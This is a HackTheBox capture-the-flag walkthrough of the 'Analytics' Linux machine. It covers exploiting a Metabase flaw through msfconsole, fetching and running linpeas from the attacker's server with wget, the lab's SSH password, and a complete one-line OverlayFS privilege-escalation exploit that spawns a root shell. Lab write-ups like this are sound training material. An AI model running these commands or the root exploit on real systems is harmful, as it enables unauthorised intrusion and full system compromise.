Analytics | HackTheBox Walkthrough
About Machine
Analytics is the easy Linux machine on HackTheBox, created by 7u9y and TheCyberGeek. During the enumeration process, a login page on port 80 was discovered, hosted on a subdomain powered by Metabase, which was found to be vulnerable to CVE-2023–38646. CVE-2023–38646 was exploited with msfconsole, resulting in the acquisition of a shell. Subsequently, during user enumeration using LinPeas, a login username and password for SSH were obtained. For privilege escalation, it was determined through enumeration that the machine was vulnerable to CVE-2023–2640, which facilitated the attainment of root access.
Enumeration
nmap -sV -sC -p- 10.10.11.233
Port 22 (SSH) and port 80 (HTTP) were found to be open.
As 80 ports were opened, the enumeration was initiated, leading to the discovery of a website hosted on one of them. While viewing the page source, a subdomain, data.analytical.htb, was found where a login page had been hosted.
nano /etc/hosts
The subdomain was added to my attack machine’s /etc/hosts file.
While navigating to the subdomain, a webpage hosting a login form of Metabase was encountered, I started the search for a Metabase vulnerability POC.
While searching for Metabase vulnerabilities, it was discovered that it was vulnerable to CVE-2023–38646. After gaining an understanding of the vulnerability, an attempt was made to exploit it using msfconsole.
msfconsole
A payload for Metabase was searched for and used to exploit.
The RPORT should be set to 80, and the RHOST should be set to data.analytical.htb. Additionally, the LHOST should be changed to your VPN IP address.
After running the payload, the shell of Metabase was successfully obtained. Further enumeration inside the machine was run by using script linpeas.
python3 -m http.server 80
wget http://<VPN IP>/linpeas.sh
The Python server was initiated on the attack machine where linpease was located. Subsequently, within the machine, the home directory of the user “metabase” was accessed, and linpease was downloaded from the attacker machine.
bash linepeas.sh
After analyzing the results of linpeas, the username and password were discovered, and they were employed to log in via SSH.
ssh metalytics@<machine_IP>
Password: An4lytics_ds20223#
Using the above credentials, access to the user account was successfully gained.
The user flag was located in the home directory of the user.
Privilege Escalation
For the privilege escalation attempt, linpeas was downloaded onto the machine using a Python server, and the script was executed.
While reviewing the results of linpeas, it was discovered that the machine’s version was Ubuntu 22.04.3. The search for vulnerabilities pertaining to this version was initiated.
After extensive searching on Google, it was determined that the machine’s version was susceptible to CVE-2023–2640 and CVE-2023–32629.
unshare -rm sh -c "mkdir 1 u w m && cp /u*/b*/p*3 1/; setcap cap_setuid+eip 1/python3;mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w, m && touch m/*;" && u/python3 -c 'import pty; import os;os.setuid(0); pty.spawn("/bin/bash")'
In my case, CVE-2023–2640 was effective, and root access was obtained.
The root flag was found in the home directory of the root, and, ultimately, the root flag was located.